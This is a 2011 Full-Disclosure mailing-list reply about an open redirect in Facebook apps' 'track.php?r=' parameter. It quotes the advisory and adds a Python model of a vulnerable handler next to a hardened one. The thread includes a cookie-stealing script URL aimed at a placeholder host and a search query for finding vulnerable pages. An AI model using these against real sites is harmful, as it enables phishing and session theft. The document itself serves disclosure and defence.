List: full-disclosure
Subject: Re: [Full-disclosure] Facebook URL Redirect Vulnerability
From: Javier Bassi <javierbassi () gmail ! com>
Date: 2011-02-28 21:32:59
Message-ID: AANLkTik+9Eo5QKyACQ2TCQDUPk3=XVeRHuQUJvueiqSn () mail ! gmail ! com
Since Facebook uses a 302 redirect, the attacker can't steal the victim's cookie
with a link like this:
http://apps.facebook.com/truthsaboutu/track.php?r=http://someurl.com/?cookie=<script>document.write(document.cookie)</script>
But still, this can be useful for a phishing attack.
On Mon, Feb 28, 2011 at 2:42 PM, Nathan Power <np@securitypentest.com> wrote:
> ------------------------------------------------------------------
> 1. Summary:
>
> Once the victim clicks on a specially crafted Facebook URL they can be
> redirected to a malicious website.
> ------------------------------------------------------------------
> 2. Description:
>
> Facebook applications' use of 'track.php?r=' doesn't sanitize the
> redirection input properly. This allows an attacker to input any URL that a
> victim will get redirected to. It is not required for the victim to be
> logged in to Facebook for this attack to work.
>
> The following is an example of a vulnerable URL:
>
> http://apps.facebook.com/truthsaboutu/track.php?r=http://www.securitypentest.com
>
> The following Google search query can be used to find vulnerable URLs:
> site:facebook.com inurl:"track.php?" inurl:"r="
> ------------------------------------------------------------------
> 3. Impact:
>
> Potentially allow an attacker to compromise a victim's Facebook account
> and/or computer system.
> ------------------------------------------------------------------
> 4. Affected Products:
>
> www.facebook.com
> ------------------------------------------------------------------
> 5. Solution: None
> ------------------------------------------------------------------
> 6. Time Table:
>
> 2/27/2011 Reported Vulnerability to the Vendor
> ------------------------------------------------------------------
> 7. Credits:
>
> Discovered by Nathan Power
> www.securitypentest.com
> ------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
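The open redirect described in the quoted advisory, and the reason the cookie-stealing link in the reply does not run anything on the redirecting origin, as an added example (not Facebook's code and not either poster's): a minimal Python model of a `track.php?r=`-style handler that copies the parameter verbatim into the Location header, beside a hardened version that only follows same-site targets. `ALLOWED_HOSTS`, the host `apps.example.com` and the query strings in the demo are assumptions made for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Assumption for illustration: the only host the app should ever redirect to.
ALLOWED_HOSTS = {"apps.example.com"}


def _target_from_query(query: str) -> str:
    """Return the r= parameter from a raw query string ('' if absent)."""
    params = parse_qs(query, keep_blank_values=True)
    return params.get("r", [""])[0]


def vulnerable_redirect(query: str):
    """Model of the track.php?r= behaviour the advisory describes:
    whatever arrives in r= is copied verbatim into the Location header.
    Returns (status, headers, body); note the body is empty, so an injected
    <script> never appears in a page served from this origin."""
    return 302, {"Location": _target_from_query(query)}, b""


def is_local_target(target: str) -> bool:
    """Accept only targets on ALLOWED_HOSTS or site-relative paths.

    Rejected forms include:
      http://evil.example/                    absolute URL to another host
      //evil.example/                         scheme-relative URL
      /\\evil.example/                         backslash, normalised to // by browsers
      http://apps.example.com@evil.example/   userinfo trick
      javascript:alert(1)                     non-http scheme
      anything containing CR, LF or NUL        header injection
    """
    if any(c in target for c in "\r\n\x00"):
        return False
    # Browsers treat backslash like forward slash in http(s) URLs; do the same
    # before parsing so '/\\evil.example' is seen as '//evil.example'.
    normalised = target.replace("\\", "/")
    parts = urlsplit(normalised)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False
    if parts.scheme or parts.netloc:
        # .hostname is lower-cased and has any user:pass@ stripped, so this
        # compares against the host the browser would actually connect to.
        return parts.hostname in ALLOWED_HOSTS
    # No scheme, no authority: a site-relative path such as /profile?id=1.
    return normalised.startswith("/")


def safe_redirect(query: str, fallback: str = "/"):
    """Hardened handler: redirect only to vetted targets, otherwise to fallback."""
    target = _target_from_query(query)
    if not is_local_target(target):
        target = fallback
    return 302, {"Location": target}, b""


if __name__ == "__main__":
    # Constructed query strings modelled on the advisory and the reply.
    open_redirect = "r=http://www.securitypentest.com"
    cookie_payload = "r=http://someurl.com/?cookie=<script>document.write(document.cookie)</script>"
    for q in (open_redirect, cookie_payload, "r=/profile?id=1"):
        print("vulnerable:", vulnerable_redirect(q)[1]["Location"])
        print("hardened:  ", safe_redirect(q)[1]["Location"])
```

In the vulnerable handler the `<script>` payload ends up only in the Location header, never in a response body served from the app's origin, so the browser simply navigates to the attacker's URL and any script runs in that site's context; that is what the reply above is pointing out, and why the practical use is phishing rather than cookie theft. The hardened version also rejects scheme-relative (`//host`), backslash and userinfo (`user@host`) forms, which a naive `startswith('/')` or substring check on the hostname would let through.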